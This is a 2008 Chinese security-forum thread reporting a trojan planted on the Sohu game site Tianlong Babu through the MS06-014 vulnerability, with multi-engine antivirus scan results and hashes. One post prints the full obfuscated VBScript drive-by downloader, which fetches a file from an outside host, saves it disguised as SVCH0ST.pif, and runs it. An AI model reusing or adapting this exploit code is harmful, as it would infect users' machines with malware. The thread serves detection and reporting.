搜狐网游天龙八部又被挂上MS06-14漏洞的木马

显示全部楼层 · 发表于 2008-8-7 02:38:24

搜狐网游天龙八部又被挂上MS06-14漏洞的木马

和上上次一样，同样是脚本一出错，我服了这人，老挂MS06-14啊~~~~~~~~~~~~~~要上报就快呀。。。

文件 QQQQQQQQQQqqq.rar 接收于 2008.08.06 20:29:13 (CET)
结果: 11/36 (30.56%)

反病毒引擎版本最后更新扫描结果
AhnLab-V3 2008.8.7.0 2008.08.06 -
AntiVir 7.8.1.15 2008.08.06 HTML/Rce.Gen
Authentium 5.1.0.4 2008.08.05 -
Avast 4.8.1195.0 2008.08.06 VBS:Obfuscated-gen
AVG 8.0.0.156 2008.08.06 JS/Downloader.Agent
BitDefender 7.2 2008.08.06 -
CAT-QuickHeal 9.50 2008.08.06 -
ClamAV 0.93.1 2008.08.06 JS.Psyme-36
DrWeb 4.44.0.09170 2008.08.06 -
eSafe 7.0.17.0 2008.08.06 -
eTrust-Vet 31.6.6015 2008.08.06 -
Ewido 4.0 2008.08.06 Downloader.AniLoad.nae
F-Prot 4.4.4.56 2008.08.05 -
F-Secure 7.60.13501.0 2008.08.06 VBS/Psyme.BF
Fortinet 3.14.0.0 2008.08.06 -
GData 2.0.7306.1023 2008.08.06 VBS:Obfuscated-gen
Ikarus T3.1.1.34.0 2008.08.06 -
K7AntiVirus 7.10.405 2008.08.06 -
Kaspersky 7.0.0.125 2008.08.06 -
McAfee 5355 2008.08.06 -
Microsoft 1.3807 2008.08.06 TrojanDownloader:VBS/Psyme.gen!D
NOD32v2 3333 2008.08.06 -
Norman 5.80.02 2008.08.06 -
Panda 9.0.0.4 2008.08.06 -
PCTools 4.4.2.0 2008.08.06 HTML.Psyme.Gen
Prevx1 V2 2008.08.06 -
Rising 20.56.22.00 2008.08.06 -
Sophos 4.31.0 2008.08.06 -
Sunbelt 3.1.1537.1 2008.08.06 -
Symantec 10 2008.08.06 -
TheHacker 6.2.96.393 2008.08.04 -
TrendMicro 8.700.0.1004 2008.08.06 -
VBA32 3.12.8.2 2008.08.05 -
ViRobot 2008.8.6.1326 2008.08.06 -
VirusBuster 4.5.11.0 2008.08.06 HTML.Psyme.Gen
Webwasher-Gateway 6.6.2 2008.08.06 Script.Rce.Gen
附加信息
File size: 2061 bytes
MD5...: 34013774242b9c7fd79f5ee780af8844
SHA1..: 0941fea7f265cf0de3f61f2811b5c2c7df9b3033
SHA256: a4730f37359c7ca093f4e36462b6265bc1e0d633693a39eb5b08a36db86ffc6a
SHA512: 00f329cdefc6b649484d924df0c55d496d81c18a44b7beab01589a3cc96eb831
9717db07b054d88efa27b44ff3ade27387d4d310385fd3b743bab036175963be
PEiD..: -
PEInfo: -

VirSCAN.org Scanned Report :
Scanned time : 2008/08/07 02:29:01 (CST)
Scanner results: 22%的杀软(8/36)报告发现病毒
File Name    : QQQQQQQQQQqqq.rar
File Size    : 2061 byte
File Type    : RAR archive data, v1d, os
MD5          : 34013774242b9c7fd79f5ee780af8844
SHA1          : 0941fea7f265cf0de3f61f2811b5c2c7df9b3033
Online report  : ht　tp://virscan.org/report/96ca4288f9482a40f61a41e4ccd5d1d5.html

Scanner       Engine Ver    Sig Ver          Sig Date Time Scan result
a-squared    3.5.0.22       2008.08.05       2008-08-05  2.42 -
安博士V3    2008.08.07.00 2008.08.07       2008-08-07  0.85 -
AntiVir       7.8.1.19       7.0.5.222       2008-08-06  2.17 HTML/Rce.Gen
Arcavir       1.0.5          200808061244    2008-08-06  1.17 -
AVAST!       3.0.1          080806-0       2008-08-06  0.00 VBS:Obfuscated-gen [Trj]
AVG          7.5.51.442    270.5.12/1595    2008-08-06  1.51 -
BitDefender 7.60825.1418157 7.20383          2008-08-07  2.66 -
CA (VET)    9.0.0.143    31.6.6015       2008-08-06  5.10 -
ClamAV       0.93.3       7959             2008-08-06  0.00 JS.Psyme-36
Comodo       2.11          2.0.0.608       2008-08-06  0.41 -
CP Secure    1.1.0.715    2008.08.07       2008-08-07  5.92 Troj.Downloader.JS.Psyme.aw
Dr.Web       4.44.0.9170    2008.08.06       2008-08-06  3.09 -
ewido       4.0.0.2       2008.08.04       2008-08-04  2.62 Downloader.AniLoad.nae
F-Prot       4.4.4.56       20080805       2008-08-05  0.97 -
F-Secure    5.51.6100    2008.08.06.05    2008-08-06  2.92 -
飞塔          2.81-3.11    9.388          2008-08-05  1.65 -
ViRobot       20080801       2008.08.01       2008-08-01  0.40 -
Ikarus       T3.1.01.34    2008.08.06.71228  2008-08-06  3.11 -
江民杀毒    11.0.706       2008.08.06       2008-08-06  1.14 -
卡巴斯基    5.5.10       2008.08.06       2008-08-06  0.02 -
金山毒霸    2008.1.14.15 2008.8.6.17    2008-08-06  0.55 -
迈克菲       5.2.00       5355             2008-08-06  2.41 -
Microsoft    1.3807       2008.08.06       2008-08-06  4.05 TrojanDownloader:VBS/Psyme.gen!D
mks_vir       2.01          2008.08.06       2008-08-06  2.50 -
Norman       5.93.01       5.93.00          2008-08-05  4.73 VBS/Psyme.BF
熊猫卫士    9.05.01       2008.08.06       2008-08-06  1.94 -
趋势科技    8.700-1004    5.460.01       2008-08-06  0.02 -
Quick Heal    9.50          2008.08.06       2008-08-06  1.62 -
瑞星          20.0          20.56.22.00    2008-08-06  0.24 -
Sophos       2.77.0       4.32             2008-08-07  1.76 -
Sunbelt       3.1.1537.1    2181             2008-08-05  0.40 -
赛门铁克    1.3.0.24       20080803.002    2008-08-03  0.04 -
nProtect    2008-08-06.00 1739997          2008-08-06  3.19 -
The Hacker    6.2.96       v00393          2008-08-04  0.38 -
VBA32       3.12.8.2       20080805.0822    2008-08-05  1.15 -
VirusBuster 4.5.11.10    10.83.8/597521 2008-08-06  0.78 HTML.Psyme.Gen

[ 本帖最后由小飞侠.net 于 2008-8-7 02:41 编辑 ]

显示全部楼层 · 发表于 2008-8-7 03:47:53

Not even encrypted, zomg
http://user1.16-36.net/ms06014.css

显示全部楼层 · 发表于 2008-8-7 09:29:29

对象: ms06014.css
路径: F:\Downloads
Status: 病毒文件已删除
病毒: BehavesLike:Win32.Malware (BD 引擎)

显示全部楼层 · 发表于 2008-8-7 09:34:08

Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL: http://user1.16-36.net/ms06014.css
Information: Is the TR/Downloader.Gen Trojan

Generated by AntiVir WebGuard 8.0.15.0, AVE 8.1.1.19, VDF 7.0.5.223

显示全部楼层 · 发表于 2008-8-7 09:43:01

病毒 2008-08-07 09:42:09 C:\Documents and Settings\Administrator\桌面\ms06014.css Win32.Troj.AgentT.fd.12288 跳过，未处理

显示全部楼层 · 发表于 2008-8-7 10:01:39

/*
*/
<html>
<body>
</body>

<script language=VBScript>
On Error Resume Next
dubasbaddressssssssss = "http://user1.16-36.net/ms06014.css"
dubasbobj="o"
dubasbobjs="b"
dubasbobjss="j"
dubasbobjsss="e"
dubasbobjssss="c"
dubasbobjsssss="t"
Set dubasb_2_cn = document.createElement(dubasbobj&dubasbobjs&dubasbobjss&dubasbobjsss&dubasbobjssss&dubasbobjsssss)
dubasbid="clsid:"
dubasbidx="BD"
dubasbid2="96"
dubasbid3="C5"
dubasbid4="56-6"
dubasbid5="5A"
dubasbid6="3-1"
dubasbid7="1D"
dubasbid8="0-98"
dubasbid9="3A-0"
dubasbid10="0C0"
dubasbid11="4FC"
dubasbid12="29E"
dubasbid13="36"
dubasb3="Microsoft.X"
dubasb4="MLHTTp"
dubasb5="G"
dubasb6="E"
dubasb7="T"
dubasbxml="M"&"i"&"c"&"r"&"osof"&"t.XM"&"LHTTp"
dubasb_2_cn.SetAttribute "classid", dubasbid&dubasbidx&dubasbid2&dubasbid3&dubasbid4&dubasbid5&dubasbid6&dubasbid7&dubasbid8&dubasbid9&dubasbid10&dubasbid11&dubasbid12&dubasbid13
Set dubasb_love=dubasb_2_cn.CreateObject(dubasbxml,"")
dubasb_love.Open dubasb5&dubasb6&dubasb7, dubasbaddressssssssss, False
dubasb_love.Send
dubasbbuffe="SVCH0ST.pif"
dubasb_kfqq_sssssssss="SVCH0ST.vbs"
Q784378237="Scripting."
Q784378237s="FileSyst"
Q784378237ss="emObject"
Q784378237sss="Adod"
Q784378237ssss="b.stream"
Q784378237sssss=Q784378237sss&Q784378237ssss
Set chilam = dubasb_2_cn.createobject(Q784378237&Q784378237s&Q784378237ss,"")
Set yingying = chilam.GetSpecialFolder(2)
dubasbuser="chilam"
dubasbbuffe=chilam.BuildPath(yingying,dubasbbuffe)
dubasb_kfqq_sssssssss=chilam.BuildPath(yingying,dubasb_kfqq_sssssssss)
Set chilams = dubasb_2_cn.createobject(Q784378237sssss,"")
chilams.type=1
chilams.Open
chilams.Write dubasb_love.Responsebody
chilams.Savetofile dubasbbuffe,2
chilams.Close
chilams.Type=2
chilams.Open
chilams.WriteText "'c_u_t_e_q_q_i_l_o_v_e_y_o_u"&"'c_u_t_e_q_q_i_l_o_v_e_y_o_u"&vbCrLf&"Set i_love_dubasb = CreateObject(""Wscript"&".Shell"")"&"'c_u_t_e_q_q_i_l_o_v_e_y_o_u"&vbCrLf&"'c_u_t_e_q_q_i_l_o_v_e_y_o_u"&"'c_u_t_e_q_q_i_l_o_v_e_y_o_u"&vbCrLf&"i_love_dubasb.run ("""&dubasbbuffe&""")"&vbCrLf&"'c_u_t_e_q_q_i_l_o_v_e_y_o_u"&"'c_u_t_e_q_q_i_l_o_v_e_y_o_u"
chilams.Savetofile dubasb_kfqq_sssssssss,2
chilams.Close
www="She"
cute="ll.A"
qq="ppl"
cn="ica"
kfqq="tion"
Set dubasbsened = dubasb_2_cn.createobject(www&cute&qq&cn&kfqq, "")
dubasbdk="O"
dubasbdks="p"
dubasbdkss="e"
dubasbdksss="n"
dubasbsened.ShellExeCute dubasb_kfqq_sssssssss, "", "", dubasbdk&dubasbdks&dubasbdkss&dubasbdksss, 0
</script>

</html>
<script type="text/jscript">function init() { document.write("");}window.onload = init;</script>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">

显示全部楼层 · 发表于 2008-8-7 10:02:03

费尔 TrojanDownloader.Small.xop.gen

显示全部楼层 · 发表于 2008-8-7 19:42:48

avp miss

显示全部楼层 · 发表于 2008-8-7 20:01:12

454没反映

显示全部楼层 · 发表于 2008-8-7 20:25:44

McAfee 没反应。。。

[已鉴定] 搜狐网游天龙八部又被挂上MS06-14漏洞的木马